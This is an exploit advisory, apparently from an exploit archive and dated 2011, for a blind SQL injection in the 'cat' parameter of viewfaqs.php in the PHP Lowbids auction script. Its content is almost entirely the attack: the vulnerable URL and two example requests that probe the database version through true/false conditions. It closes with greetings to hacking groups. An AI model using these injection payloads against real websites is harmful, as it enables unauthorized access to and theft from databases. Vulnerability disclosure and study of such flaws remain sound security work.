ExploitFixes
PHP Lowbids viewfaqs.php Blind SQL Injection Vulnerability 2011-01-21 09:15:10

==
[+]Script: PHP Lowbids
[+]Version: n/a
[+]Link: http://phplowbids.com
==
[+]Author: BorN To K!LL - h4ck3r
[+]Contact: [email protected]
==
[+]3xploit:
/viewfaqs.php?cat=[Blind-Injection]

[+]3xample:
/viewfaqs.php?cat=1 and substring(version(),1,1)=4 // true
/viewfaqs.php?cat=1 and substring(version(),1,1)=5 // false

==
[+]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==